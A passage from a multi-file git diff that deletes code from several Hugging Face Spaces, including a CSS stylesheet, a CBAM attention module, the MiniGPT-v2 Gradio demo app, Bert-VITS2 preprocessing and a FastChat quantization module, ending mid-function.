b/spaces/ThunderJames/PhotoRealistic/style.css deleted file mode 100644 index 114adf441e9032febb46bc056b2a8bb651075f0d..0000000000000000000000000000000000000000 --- a/spaces/ThunderJames/PhotoRealistic/style.css +++ /dev/null @@ -1,28 +0,0 @@ -body { - padding: 2rem; - font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif; -} - -h1 { - font-size: 16px; - margin-top: 0; -} - -p { - color: rgb(107, 114, 128); - font-size: 15px; - margin-bottom: 10px; - margin-top: 5px; -} - -.card { - max-width: 620px; - margin: 0 auto; - padding: 16px; - border: 1px solid lightgray; - border-radius: 16px; -} - -.card p:last-child { - margin-bottom: 0; -} diff --git a/spaces/VIPLab/Track-Anything/tracker/model/cbam.py b/spaces/VIPLab/Track-Anything/tracker/model/cbam.py deleted file mode 100644 index 6423358429e2843b1f36ceb2bc1a485ea72b8eb4..0000000000000000000000000000000000000000 --- a/spaces/VIPLab/Track-Anything/tracker/model/cbam.py +++ /dev/null @@ -1,77 +0,0 @@ -# Modified from https://github.com/Jongchan/attention-module/blob/master/MODELS/cbam.py - -import torch -import torch.nn as nn -import torch.nn.functional as F - -class BasicConv(nn.Module): - def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True): - super(BasicConv, self).__init__() - self.out_channels = out_planes - self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=groups, bias=bias) - - def forward(self, x): - x = self.conv(x) - return x - -class Flatten(nn.Module): - def forward(self, x): - return x.view(x.size(0), -1) - -class ChannelGate(nn.Module): - def __init__(self, gate_channels, reduction_ratio=16, pool_types=['avg', 'max']): - super(ChannelGate, self).__init__() - self.gate_channels = gate_channels - self.mlp = nn.Sequential( - Flatten(), - nn.Linear(gate_channels, gate_channels // reduction_ratio), - nn.ReLU(), - nn.Linear(gate_channels // reduction_ratio, gate_channels) - ) - self.pool_types = pool_types - def forward(self, x): - channel_att_sum = None - for pool_type in self.pool_types: - if pool_type=='avg': - avg_pool = F.avg_pool2d( x, (x.size(2), x.size(3)), stride=(x.size(2), x.size(3))) - channel_att_raw = self.mlp( avg_pool ) - elif pool_type=='max': - max_pool = F.max_pool2d( x, (x.size(2), x.size(3)), stride=(x.size(2), x.size(3))) - channel_att_raw = self.mlp( max_pool ) - - if channel_att_sum is None: - channel_att_sum = channel_att_raw - else: - channel_att_sum = channel_att_sum + channel_att_raw - - scale = torch.sigmoid( channel_att_sum ).unsqueeze(2).unsqueeze(3).expand_as(x) - return x * scale - -class ChannelPool(nn.Module): - def forward(self, x): - return torch.cat( (torch.max(x,1)[0].unsqueeze(1), torch.mean(x,1).unsqueeze(1)), dim=1 ) - -class SpatialGate(nn.Module): - def __init__(self): - super(SpatialGate, self).__init__() - kernel_size = 7 - self.compress = ChannelPool() - self.spatial = BasicConv(2, 1, kernel_size, stride=1, padding=(kernel_size-1) // 2) - def forward(self, x): - x_compress = self.compress(x) - x_out = self.spatial(x_compress) - scale = torch.sigmoid(x_out) # broadcasting - return x * scale - -class CBAM(nn.Module): - def __init__(self, gate_channels, reduction_ratio=16, pool_types=['avg', 'max'], no_spatial=False): - super(CBAM, self).__init__() - self.ChannelGate = ChannelGate(gate_channels, reduction_ratio, pool_types) - self.no_spatial=no_spatial - if not no_spatial: - self.SpatialGate = SpatialGate() - def forward(self, x): - x_out = self.ChannelGate(x) - if not self.no_spatial: - x_out = self.SpatialGate(x_out) - return x_out diff --git a/spaces/VickyKira/NASAGPT/client/js/change-language.js b/spaces/VickyKira/NASAGPT/client/js/change-language.js deleted file mode 100644 index ce87f6f60c7a9acca5e1902612930ef677f3fb65..0000000000000000000000000000000000000000 --- a/spaces/VickyKira/NASAGPT/client/js/change-language.js +++ /dev/null @@ -1,47 +0,0 @@ -document.addEventListener('DOMContentLoaded', fetchLanguages); - -async function fetchLanguages() { - try { - const [languagesResponse, currentLanguageResponse] = await Promise.all([ - fetch(`${url_prefix}/get-languages`), - fetch(`${url_prefix}/get-locale`) - ]); - - const languages = await languagesResponse.json(); - const currentLanguage = await currentLanguageResponse.text(); - - const languageSelect = document.getElementById('language'); - languages.forEach(lang => { - const option = document.createElement('option'); - option.value = lang; - option.textContent = lang; - languageSelect.appendChild(option); - }); - - const savedLanguage = localStorage.getItem("language") || currentLanguage; - setLanguageOnPageLoad(savedLanguage); - } catch (error) { - console.error("Failed to fetch languages or current language"); - } -} - -function setLanguageOnPageLoad(language) { - document.getElementById("language").value = language; -} - -function changeLanguage(lang) { - fetch(`${url_prefix}/change-language`, { - method: "POST", - headers: { - "Content-Type": "application/json", - }, - body: JSON.stringify({ language: lang }), - }).then((response) => { - if (response.ok) { - localStorage.setItem("language", lang); - location.reload(); - } else { - console.error("Failed to change language"); - } - }); -} diff --git a/spaces/Vision-CAIR/MiniGPT-v2/app.py b/spaces/Vision-CAIR/MiniGPT-v2/app.py deleted file mode 100644 index efc0b16e1155c0b415428013771ba1583a425062..0000000000000000000000000000000000000000 --- a/spaces/Vision-CAIR/MiniGPT-v2/app.py +++ /dev/null @@ -1,656 +0,0 @@ -import argparse -import os -import random -from collections import defaultdict - -import cv2 -import re - -import numpy as np -from PIL import Image -import torch -import html -import gradio as gr - -import torchvision.transforms as T -import torch.backends.cudnn as cudnn - -from minigpt4.common.config import Config - -from minigpt4.common.registry import registry -from minigpt4.conversation.conversation import Conversation, SeparatorStyle, Chat - -# imports modules for registration -from minigpt4.datasets.builders import * -from minigpt4.models import * -from minigpt4.processors import * -from minigpt4.runners import * -from minigpt4.tasks import * - -import warnings -warnings.filterwarnings("ignore") - -def parse_args(): - parser = argparse.ArgumentParser(description="Demo") - parser.add_argument("--cfg-path", default='eval_configs/minigptv2_eval.yaml', - help="path to configuration file.") - parser.add_argument("--gpu-id", type=int, default=0, help="specify the gpu to load the model.") - parser.add_argument( - "--options", - nargs="+", - help="override some settings in the used config, the key-value pair " - "in xxx=yyy format will be merged into config file (deprecate), " - "change to --cfg-options instead.", - ) - args = parser.parse_args() - return args - - -random.seed(42) -np.random.seed(42) -torch.manual_seed(42) - -cudnn.benchmark = False -cudnn.deterministic = True - -print('Initializing Chat') -args = parse_args() -cfg = Config(args) - -device = 'cuda:{}'.format(args.gpu_id) - -model_config = cfg.model_cfg -model_config.device_8bit = args.gpu_id -model_cls = registry.get_model_class(model_config.arch) -model = model_cls.from_config(model_config).to(device) -bounding_box_size = 100 - -vis_processor_cfg = cfg.datasets_cfg.cc_sbu_align.vis_processor.train -vis_processor = registry.get_processor_class(vis_processor_cfg.name).from_config(vis_processor_cfg) - -model = model.eval() - -CONV_VISION = Conversation( - system="", - roles=(r"[INST] ", r" [/INST]"), - messages=[], - offset=2, - sep_style=SeparatorStyle.SINGLE, - sep="", -) - - -def extract_substrings(string): - # first check if there is no-finished bracket - index = string.rfind('}') - if index != -1: - string = string[:index + 1] - - pattern = r'

    (.*?)\}(?!<)' - matches = re.findall(pattern, string) - substrings = [match for match in matches] - - return substrings - - -def is_overlapping(rect1, rect2): - x1, y1, x2, y2 = rect1 - x3, y3, x4, y4 = rect2 - return not (x2 < x3 or x1 > x4 or y2 < y3 or y1 > y4) - - -def computeIoU(bbox1, bbox2): - x1, y1, x2, y2 = bbox1 - x3, y3, x4, y4 = bbox2 - intersection_x1 = max(x1, x3) - intersection_y1 = max(y1, y3) - intersection_x2 = min(x2, x4) - intersection_y2 = min(y2, y4) - intersection_area = max(0, intersection_x2 - intersection_x1 + 1) * max(0, intersection_y2 - intersection_y1 + 1) - bbox1_area = (x2 - x1 + 1) * (y2 - y1 + 1) - bbox2_area = (x4 - x3 + 1) * (y4 - y3 + 1) - union_area = bbox1_area + bbox2_area - intersection_area - iou = intersection_area / union_area - return iou - - -def save_tmp_img(visual_img): - file_name = "".join([str(random.randint(0, 9)) for _ in range(5)]) + ".jpg" - file_path = "/tmp/gradio" + file_name - visual_img.save(file_path) - return file_path - - -def mask2bbox(mask): - if mask is None: - return '' - mask = mask.resize([100, 100], resample=Image.NEAREST) - mask = np.array(mask)[:, :, 0] - - rows = np.any(mask, axis=1) - cols = np.any(mask, axis=0) - - if rows.sum(): - # Get the top, bottom, left, and right boundaries - rmin, rmax = np.where(rows)[0][[0, -1]] - cmin, cmax = np.where(cols)[0][[0, -1]] - bbox = '{{<{}><{}><{}><{}>}}'.format(cmin, rmin, cmax, rmax) - else: - bbox = '' - - return bbox - - -def escape_markdown(text): - # List of Markdown special characters that need to be escaped - md_chars = ['<', '>'] - - # Escape each special character - for char in md_chars: - text = text.replace(char, '\\' + char) - - return text - - -def reverse_escape(text): - md_chars = ['\\<', '\\>'] - - for char in md_chars: - text = text.replace(char, char[1:]) - - return text - - -colors = [ - (255, 0, 0), - (0, 255, 0), - (0, 0, 255), - (210, 210, 0), - (255, 0, 255), - (0, 255, 255), - (114, 128, 250), - (0, 165, 255), - (0, 128, 0), - (144, 238, 144), - (238, 238, 175), - (255, 191, 0), - (0, 128, 0), - (226, 43, 138), - (255, 0, 255), - (0, 215, 255), -] - -color_map = { - f"{color_id}": f"#{hex(color[2])[2:].zfill(2)}{hex(color[1])[2:].zfill(2)}{hex(color[0])[2:].zfill(2)}" for - color_id, color in enumerate(colors) -} - -used_colors = colors - - -def visualize_all_bbox_together(image, generation): - if image is None: - return None, '' - - generation = html.unescape(generation) - - image_width, image_height = image.size - image = image.resize([500, int(500 / image_width * image_height)]) - image_width, image_height = image.size - - string_list = extract_substrings(generation) - if string_list: # it is grounding or detection - mode = 'all' - entities = defaultdict(list) - i = 0 - j = 0 - for string in string_list: - try: - obj, string = string.split('

    ') - except ValueError: - print('wrong string: ', string) - continue - bbox_list = string.split('') - flag = False - for bbox_string in bbox_list: - integers = re.findall(r'-?\d+', bbox_string) - if len(integers) == 4: - x0, y0, x1, y1 = int(integers[0]), int(integers[1]), int(integers[2]), int(integers[3]) - left = x0 / bounding_box_size * image_width - bottom = y0 / bounding_box_size * image_height - right = x1 / bounding_box_size * image_width - top = y1 / bounding_box_size * image_height - - entities[obj].append([left, bottom, right, top]) - - j += 1 - flag = True - if flag: - i += 1 - else: - integers = re.findall(r'-?\d+', generation) - - if len(integers) == 4: # it is refer - mode = 'single' - - entities = list() - x0, y0, x1, y1 = int(integers[0]), int(integers[1]), int(integers[2]), int(integers[3]) - left = x0 / bounding_box_size * image_width - bottom = y0 / bounding_box_size * image_height - right = x1 / bounding_box_size * image_width - top = y1 / bounding_box_size * image_height - entities.append([left, bottom, right, top]) - else: - # don't detect any valid bbox to visualize - return None, '' - - if len(entities) == 0: - return None, '' - - if isinstance(image, Image.Image): - image_h = image.height - image_w = image.width - image = np.array(image) - - elif isinstance(image, str): - if os.path.exists(image): - pil_img = Image.open(image).convert("RGB") - image = np.array(pil_img)[:, :, [2, 1, 0]] - image_h = pil_img.height - image_w = pil_img.width - else: - raise ValueError(f"invaild image path, {image}") - elif isinstance(image, torch.Tensor): - - image_tensor = image.cpu() - reverse_norm_mean = torch.tensor([0.48145466, 0.4578275, 0.40821073])[:, None, None] - reverse_norm_std = torch.tensor([0.26862954, 0.26130258, 0.27577711])[:, None, None] - image_tensor = image_tensor * reverse_norm_std + reverse_norm_mean - pil_img = T.ToPILImage()(image_tensor) - image_h = pil_img.height - image_w = pil_img.width - image = np.array(pil_img)[:, :, [2, 1, 0]] - else: - raise ValueError(f"invaild image format, {type(image)} for {image}") - - indices = list(range(len(entities))) - - new_image = image.copy() - - previous_bboxes = [] - # size of text - text_size = 0.5 - # thickness of text - text_line = 1 # int(max(1 * min(image_h, image_w) / 512, 1)) - box_line = 2 - (c_width, text_height), _ = cv2.getTextSize("F", cv2.FONT_HERSHEY_COMPLEX, text_size, text_line) - base_height = int(text_height * 0.675) - text_offset_original = text_height - base_height - text_spaces = 2 - - # num_bboxes = sum(len(x[-1]) for x in entities) - used_colors = colors # random.sample(colors, k=num_bboxes) - - color_id = -1 - for entity_idx, entity_name in enumerate(entities): - if mode == 'single' or mode == 'identify': - bboxes = entity_name - bboxes = [bboxes] - else: - bboxes = entities[entity_name] - color_id += 1 - for bbox_id, (x1_norm, y1_norm, x2_norm, y2_norm) in enumerate(bboxes): - skip_flag = False - orig_x1, orig_y1, orig_x2, orig_y2 = int(x1_norm), int(y1_norm), int(x2_norm), int(y2_norm) - - color = used_colors[entity_idx % len(used_colors)] # tuple(np.random.randint(0, 255, size=3).tolist()) - new_image = cv2.rectangle(new_image, (orig_x1, orig_y1), (orig_x2, orig_y2), color, box_line) - - if mode == 'all': - l_o, r_o = box_line // 2 + box_line % 2, box_line // 2 + box_line % 2 + 1 - - x1 = orig_x1 - l_o - y1 = orig_y1 - l_o - - if y1 < text_height + text_offset_original + 2 * text_spaces: - y1 = orig_y1 + r_o + text_height + text_offset_original + 2 * text_spaces - x1 = orig_x1 + r_o - - # add text background - (text_width, text_height), _ = cv2.getTextSize(f" {entity_name}", cv2.FONT_HERSHEY_COMPLEX, text_size, - text_line) - text_bg_x1, text_bg_y1, text_bg_x2, text_bg_y2 = x1, y1 - ( - text_height + text_offset_original + 2 * text_spaces), x1 + text_width, y1 - - for prev_bbox in previous_bboxes: - if computeIoU((text_bg_x1, text_bg_y1, text_bg_x2, text_bg_y2), prev_bbox['bbox']) > 0.95 and \ - prev_bbox['phrase'] == entity_name: - skip_flag = True - break - while is_overlapping((text_bg_x1, text_bg_y1, text_bg_x2, text_bg_y2), prev_bbox['bbox']): - text_bg_y1 += (text_height + text_offset_original + 2 * text_spaces) - text_bg_y2 += (text_height + text_offset_original + 2 * text_spaces) - y1 += (text_height + text_offset_original + 2 * text_spaces) - - if text_bg_y2 >= image_h: - text_bg_y1 = max(0, image_h - (text_height + text_offset_original + 2 * text_spaces)) - text_bg_y2 = image_h - y1 = image_h - break - if not skip_flag: - alpha = 0.5 - for i in range(text_bg_y1, text_bg_y2): - for j in range(text_bg_x1, text_bg_x2): - if i < image_h and j < image_w: - if j < text_bg_x1 + 1.35 * c_width: - # original color - bg_color = color - else: - # white - bg_color = [255, 255, 255] - new_image[i, j] = (alpha * new_image[i, j] + (1 - alpha) * np.array(bg_color)).astype( - np.uint8) - - cv2.putText( - new_image, f" {entity_name}", (x1, y1 - text_offset_original - 1 * text_spaces), - cv2.FONT_HERSHEY_COMPLEX, text_size, (0, 0, 0), text_line, cv2.LINE_AA - ) - - previous_bboxes.append( - {'bbox': (text_bg_x1, text_bg_y1, text_bg_x2, text_bg_y2), 'phrase': entity_name}) - - if mode == 'all': - def color_iterator(colors): - while True: - for color in colors: - yield color - - color_gen = color_iterator(colors) - - # Add colors to phrases and remove

    - def colored_phrases(match): - phrase = match.group(1) - color = next(color_gen) - return f'{phrase}' - - generation = re.sub(r'{<\d+><\d+><\d+><\d+>}|', '', generation) - generation_colored = re.sub(r'

    (.*?)

    ', colored_phrases, generation) - else: - generation_colored = '' - - pil_image = Image.fromarray(new_image) - return pil_image, generation_colored - - -def gradio_reset(chat_state, img_list, path_list): - if chat_state is not None: - chat_state.messages = [] - if img_list is not None: - img_list = [] - if isinstance(path_list, list): - for path in path_list: - os.remove(path) - path_list.clear() - return None, gr.update(value=None, interactive=True), gr.update(placeholder='Upload your image and chat', - interactive=True), chat_state, img_list - - -def image_upload_trigger(upload_flag, replace_flag, img_list): - # set the upload flag to true when receive a new image. - # if there is an old image (and old conversation), set the replace flag to true to reset the conv later. - upload_flag = 1 - if img_list: - replace_flag = 1 - return upload_flag, replace_flag - - -def example_trigger(text_input, image, upload_flag, replace_flag, img_list): - # set the upload flag to true when receive a new image. - # if there is an old image (and old conversation), set the replace flag to true to reset the conv later. - upload_flag = 1 - if img_list or replace_flag == 1: - replace_flag = 1 - - return upload_flag, replace_flag - - -def gradio_ask(user_message, chatbot, chat_state, gr_img, img_list, upload_flag, replace_flag, path_list): - if len(user_message) == 0: - text_box_show = 'Input should not be empty!' - else: - text_box_show = '' - - if isinstance(gr_img, dict): - gr_img, mask = gr_img['image'], gr_img['mask'] - else: - mask = None - - if '[identify]' in user_message: - # check if user provide bbox in the text input - integers = re.findall(r'-?\d+', user_message) - if len(integers) != 4: # no bbox in text - bbox = mask2bbox(mask) - user_message = user_message + bbox - - if chat_state is None: - chat_state = CONV_VISION.copy() - - if upload_flag: - if replace_flag: - chat_state = CONV_VISION.copy() # new image, reset everything - replace_flag = 0 - chatbot = [] - img_list = [] - llm_message = chat.upload_img(gr_img, chat_state, img_list) - upload_flag = 0 - - chat.ask(user_message, chat_state) - - chatbot = chatbot + [[user_message, None]] - - if '[identify]' in user_message: - visual_img, _ = visualize_all_bbox_together(gr_img, user_message) - if visual_img is not None: - file_path = save_tmp_img(visual_img) - # path_list.append(file_path) - chatbot = chatbot + [[(file_path,), None]] - - return text_box_show, chatbot, chat_state, img_list, upload_flag, replace_flag - - -def gradio_answer(chatbot, chat_state, img_list, temperature): - llm_message = chat.answer(conv=chat_state, - img_list=img_list, - temperature=temperature, - max_new_tokens=500, - max_length=2000)[0] - chatbot[-1][1] = llm_message - return chatbot, chat_state - - -def gradio_stream_answer(chatbot, chat_state, img_list, temperature): - if len(img_list) > 0: - if not isinstance(img_list[0], torch.Tensor): - chat.encode_img(img_list) - streamer = chat.stream_answer(conv=chat_state, - img_list=img_list, - temperature=temperature, - max_new_tokens=500, - max_length=2000) - output = '' - for new_output in streamer: - escapped = escape_markdown(new_output) - output += escapped - chatbot[-1][1] = output - yield chatbot, chat_state - print(output) - chat_state.messages[-1][1] = '
    ' - return chatbot, chat_state - - -def gradio_visualize(chatbot, gr_img, path_list): - if isinstance(gr_img, dict): - gr_img, mask = gr_img['image'], gr_img['mask'] - - unescaped = reverse_escape(chatbot[-1][1]) - visual_img, generation_color = visualize_all_bbox_together(gr_img, unescaped) - if visual_img is not None: - if len(generation_color): - chatbot[-1][1] = generation_color - file_path = save_tmp_img(visual_img) - # path_list.append(file_path) - chatbot = chatbot + [[None, (file_path,)]] - - return chatbot - - -def gradio_taskselect(idx): - prompt_list = [ - '', - '[grounding] describe this image in detail', - '[refer] ', - '[detection] ', - '[identify] what is this ', - '[vqa] ' - ] - instruct_list = [ - '**Hint:** Type in whatever you want', - '**Hint:** Send the command to generate a grounded image description', - '**Hint:** Type in a phrase about an object in the image and send the command', - '**Hint:** Type in a caption or phrase, and see object locations in the image', - '**Hint:** Draw a bounding box on the uploaded image then send the command. Click the "clear" botton on the top right of the image before redraw', - '**Hint:** Send a question to get a short answer', - ] - return prompt_list[idx], instruct_list[idx] - - - - -chat = Chat(model, vis_processor, device=device) - -title = """

    MiniGPT-v2 Demo

    """ -description = 'Welcome to Our MiniGPT-v2 Chatbot Demo!' -# article = """

    """ -article = """

    """ - -introduction = ''' -For Abilities Involving Visual Grounding: -1. Grounding: CLICK **Send** to generate a grounded image description. -2. Refer: Input a referring object and CLICK **Send**. -3. Detection: Write a caption or phrase, and CLICK **Send**. -4. Identify: Draw the bounding box on the uploaded image window and CLICK **Send** to generate the bounding box. (CLICK "clear" button before re-drawing next time). -5. VQA: Input a visual question and CLICK **Send**. -6. No Tag: Input whatever you want and CLICK **Send** without any tagging - -You can also simply chat in free form! -''' - -text_input = gr.Textbox(placeholder='Upload your image and chat', interactive=True, show_label=False, container=False, - scale=8) -with gr.Blocks() as demo: - gr.Markdown(title) - # gr.Markdown(description) - gr.Markdown(article) - - with gr.Row(): - with gr.Column(scale=0.5): - image = gr.Image(type="pil", tool='sketch', brush_radius=20) - - temperature = gr.Slider( - minimum=0.1, - maximum=1.5, - value=0.6, - step=0.1, - interactive=True, - label="Temperature", - ) - - clear = gr.Button("Restart") - - gr.Markdown(introduction) - - with gr.Column(): - chat_state = gr.State(value=None) - img_list = gr.State(value=[]) - chatbot = gr.Chatbot(label='MiniGPT-v2') - - dataset = gr.Dataset( - components=[gr.Textbox(visible=False)], - samples=[['No Tag'], ['Grounding'], ['Refer'], ['Detection'], ['Identify'], ['VQA']], - type="index", - label='Task Shortcuts', - ) - task_inst = gr.Markdown('**Hint:** Upload your image and chat') - with gr.Row(): - text_input.render() - send = gr.Button("Send", variant='primary', size='sm', scale=1) - - upload_flag = gr.State(value=0) - replace_flag = gr.State(value=0) - path_list = gr.State(value=[]) - image.upload(image_upload_trigger, [upload_flag, replace_flag, img_list], [upload_flag, replace_flag]) - - with gr.Row(): - with gr.Column(): - gr.Examples(examples=[ - ["examples_v2/office.jpg", "[grounding] describe this image in detail", upload_flag, replace_flag, - img_list], - ["examples_v2/sofa.jpg", "[detection] sofas", upload_flag, replace_flag, img_list], - ["examples_v2/2000x1372_wmkn_0012149409555.jpg", "[refer] the world cup", upload_flag, replace_flag, - img_list], - ["examples_v2/KFC-20-for-20-Nuggets.jpg", "[identify] what is this {<4><50><30><65>}", upload_flag, - replace_flag, img_list], - ], inputs=[image, text_input, upload_flag, replace_flag, img_list], fn=example_trigger, - outputs=[upload_flag, replace_flag]) - with gr.Column(): - gr.Examples(examples=[ - ["examples_v2/glip_test.jpg", "[vqa] where should I hide in this room when playing hide and seek", - upload_flag, replace_flag, img_list], - ["examples_v2/float.png", "Please write a poem about the image", upload_flag, replace_flag, img_list], - ["examples_v2/thief.png", "Is the weapon fateful", upload_flag, replace_flag, img_list], - ["examples_v2/cockdial.png", "What might happen in this image in the next second", upload_flag, - replace_flag, img_list], - ], inputs=[image, text_input, upload_flag, replace_flag, img_list], fn=example_trigger, - outputs=[upload_flag, replace_flag]) - - dataset.click( - gradio_taskselect, - inputs=[dataset], - outputs=[text_input, task_inst], - show_progress="hidden", - postprocess=False, - queue=False, - ) - - text_input.submit( - gradio_ask, - [text_input, chatbot, chat_state, image, img_list, upload_flag, replace_flag, path_list], - [text_input, chatbot, chat_state, img_list, upload_flag, replace_flag], queue=False - ).success( - gradio_stream_answer, - [chatbot, chat_state, img_list, temperature], - [chatbot, chat_state] - ).success( - gradio_visualize, - [chatbot, image, path_list], - [chatbot], - queue=False, - ) - - send.click( - gradio_ask, - [text_input, chatbot, chat_state, image, img_list, upload_flag, replace_flag, path_list], - [text_input, chatbot, chat_state, img_list, upload_flag, replace_flag] - ).success( - gradio_stream_answer, - [chatbot, chat_state, img_list, temperature], - [chatbot, chat_state] - ).success( - gradio_visualize, - [chatbot, image, path_list], - [chatbot], - ) - - clear.click(gradio_reset, [chat_state, img_list, path_list], [chatbot, image, text_input, chat_state, img_list], queue=False) - -demo.launch(enable_queue=True) \ No newline at end of file diff --git a/spaces/XzJosh/LAPLACE-Bert-VITS2/preprocess_text.py b/spaces/XzJosh/LAPLACE-Bert-VITS2/preprocess_text.py deleted file mode 100644 index 5eb0f3b9e929fcbe91dcbeb653391227a2518a15..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/LAPLACE-Bert-VITS2/preprocess_text.py +++ /dev/null @@ -1,64 +0,0 @@ -import json -from random import shuffle - -import tqdm -from text.cleaner import clean_text -from collections import defaultdict -stage = [1,2,3] - -transcription_path = 'filelists/genshin.list' -train_path = 'filelists/train.list' -val_path = 'filelists/val.list' -config_path = "configs/config.json" -val_per_spk = 4 -max_val_total = 8 - -if 1 in stage: - with open( transcription_path+'.cleaned', 'w', encoding='utf-8') as f: - for line in tqdm.tqdm(open(transcription_path, encoding='utf-8').readlines()): - try: - utt, spk, language, text = line.strip().split('|') - norm_text, phones, tones, word2ph = clean_text(text, language) - f.write('{}|{}|{}|{}|{}|{}|{}\n'.format(utt, spk, language, norm_text, ' '.join(phones), - " ".join([str(i) for i in tones]), - " ".join([str(i) for i in word2ph]))) - except Exception as error : - print("err!", utt, error) - -if 2 in stage: - spk_utt_map = defaultdict(list) - spk_id_map = {} - current_sid = 0 - - with open( transcription_path+'.cleaned', encoding='utf-8') as f: - for line in f.readlines(): - utt, spk, language, text, phones, tones, word2ph = line.strip().split('|') - spk_utt_map[spk].append(line) - if spk not in spk_id_map.keys(): - spk_id_map[spk] = current_sid - current_sid += 1 - train_list = [] - val_list = [] - - for spk, utts in spk_utt_map.items(): - shuffle(utts) - val_list+=utts[:val_per_spk] - train_list+=utts[val_per_spk:] - if len(val_list) > max_val_total: - train_list+=val_list[max_val_total:] - val_list = val_list[:max_val_total] - - with open( train_path,"w", encoding='utf-8') as f: - for line in train_list: - f.write(line) - - with open(val_path, "w", encoding='utf-8') as f: - for line in val_list: - f.write(line) - -if 3 in stage: - assert 2 in stage - config = json.load(open(config_path, encoding='utf-8')) - config["data"]['spk2id'] = spk_id_map - with open(config_path, 'w', encoding='utf-8') as f: - json.dump(config, f, indent=2, ensure_ascii=False) diff --git a/spaces/XzJosh/Taffy-Bert-VITS2/monotonic_align/core.py b/spaces/XzJosh/Taffy-Bert-VITS2/monotonic_align/core.py deleted file mode 100644 index dddc688d76172b880054e544b7a217acd013f14f..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/Taffy-Bert-VITS2/monotonic_align/core.py +++ /dev/null @@ -1,35 +0,0 @@ -import numba - - -@numba.jit(numba.void(numba.int32[:,:,::1], numba.float32[:,:,::1], numba.int32[::1], numba.int32[::1]), nopython=True, nogil=True) -def maximum_path_jit(paths, values, t_ys, t_xs): - b = paths.shape[0] - max_neg_val=-1e9 - for i in range(int(b)): - path = paths[i] - value = values[i] - t_y = t_ys[i] - t_x = t_xs[i] - - v_prev = v_cur = 0.0 - index = t_x - 1 - - for y in range(t_y): - for x in range(max(0, t_x + y - t_y), min(t_x, y + 1)): - if x == y: - v_cur = max_neg_val - else: - v_cur = value[y-1, x] - if x == 0: - if y == 0: - v_prev = 0. - else: - v_prev = max_neg_val - else: - v_prev = value[y-1, x-1] - value[y, x] += max(v_prev, v_cur) - - for y in range(t_y - 1, -1, -1): - path[y, index] = 1 - if index != 0 and (index == y or value[y-1, index] < value[y-1, index-1]): - index = index - 1 diff --git a/spaces/Y-T-G/Blur-Anything/tracker/util/tensor_util.py b/spaces/Y-T-G/Blur-Anything/tracker/util/tensor_util.py deleted file mode 100644 index e02a65e7971ed307c0328533878cfd839d4eed53..0000000000000000000000000000000000000000 --- a/spaces/Y-T-G/Blur-Anything/tracker/util/tensor_util.py +++ /dev/null @@ -1,50 +0,0 @@ -import torch.nn.functional as F - - -def compute_tensor_iu(seg, gt): - intersection = (seg & gt).float().sum() - union = (seg | gt).float().sum() - - return intersection, union - - -def compute_tensor_iou(seg, gt): - intersection, union = compute_tensor_iu(seg, gt) - iou = (intersection + 1e-6) / (union + 1e-6) - - return iou - - -# STM -def pad_divide_by(in_img, d): - h, w = in_img.shape[-2:] - - if h % d > 0: - new_h = h + d - h % d - else: - new_h = h - if w % d > 0: - new_w = w + d - w % d - else: - new_w = w - lh, uh = int((new_h - h) / 2), int(new_h - h) - int((new_h - h) / 2) - lw, uw = int((new_w - w) / 2), int(new_w - w) - int((new_w - w) / 2) - pad_array = (int(lw), int(uw), int(lh), int(uh)) - out = F.pad(in_img, pad_array) - return out, pad_array - - -def unpad(img, pad): - if len(img.shape) == 4: - if pad[2] + pad[3] > 0: - img = img[:, :, pad[2] : -pad[3], :] - if pad[0] + pad[1] > 0: - img = img[:, :, :, pad[0] : -pad[1]] - elif len(img.shape) == 3: - if pad[2] + pad[3] > 0: - img = img[:, pad[2] : -pad[3], :] - if pad[0] + pad[1] > 0: - img = img[:, :, pad[0] : -pad[1]] - else: - raise NotImplementedError - return img diff --git a/spaces/Yiqin/ChatVID/model/__init__.py b/spaces/Yiqin/ChatVID/model/__init__.py deleted file mode 100644 index 1b8aa93b02dfe7a3d23d2d59001aa476a017aad4..0000000000000000000000000000000000000000 --- a/spaces/Yiqin/ChatVID/model/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -from .Captioner import Captioner -from .Vicuna import VicunaHandler \ No newline at end of file diff --git a/spaces/Yiqin/ChatVID/model/fastchat/serve/compression.py b/spaces/Yiqin/ChatVID/model/fastchat/serve/compression.py deleted file mode 100644 index be8363ac34c17b9b354d1daa616536ecfeaaa0ec..0000000000000000000000000000000000000000 --- a/spaces/Yiqin/ChatVID/model/fastchat/serve/compression.py +++ /dev/null @@ -1,138 +0,0 @@ -import dataclasses - -import torch -from torch import Tensor -import torch.nn as nn -from torch.nn import functional as F - - -@dataclasses.dataclass -class CompressionConfig: - """Group-wise quantization.""" - - num_bits: int - group_size: int - group_dim: int - symmetric: bool - enabled: bool = True - - -default_compression_config = CompressionConfig( - num_bits=8, group_size=256, group_dim=1, symmetric=True, enabled=True -) - - -class CLinear(nn.Module): - """Compressed Linear Layer.""" - - def __init__(self, weight, bias, device): - super().__init__() - - self.weight = compress(weight.data.to(device), default_compression_config) - self.bias = bias - - def forward(self, input: Tensor) -> Tensor: - weight = decompress(self.weight, default_compression_config) - return F.linear(input, weight, self.bias) - - -def compress_module(module, target_device): - for attr_str in dir(module): - target_attr = getattr(module, attr_str) - if type(target_attr) == torch.nn.Linear: - setattr( - module, - attr_str, - CLinear(target_attr.weight, target_attr.bias, target_device), - ) - for name, child in module.named_children(): - compress_module(child, target_device) - - -def compress(tensor, config): - """Simulate group-wise quantization.""" - if not config.enabled: - return tensor - - group_size, num_bits, group_dim, symmetric = ( - config.group_size, - config.num_bits, - config.group_dim, - config.symmetric, - ) - assert num_bits <= 8 - - original_shape = tensor.shape - num_groups = (original_shape[group_dim] + group_size - 1) // group_size - new_shape = ( - original_shape[:group_dim] - + (num_groups, group_size) - + original_shape[group_dim + 1 :] - ) - - # Pad - pad_len = (group_size - original_shape[group_dim] % group_size) % group_size - if pad_len != 0: - pad_shape = ( - original_shape[:group_dim] + (pad_len,) + original_shape[group_dim + 1 :] - ) - tensor = torch.cat( - [tensor, torch.zeros(pad_shape, dtype=tensor.dtype, device=tensor.device)], - dim=group_dim, - ) - data = tensor.view(new_shape) - - # Quantize - if symmetric: - B = 2 ** (num_bits - 1) - 1 - scale = B / torch.max(data.abs(), dim=group_dim + 1, 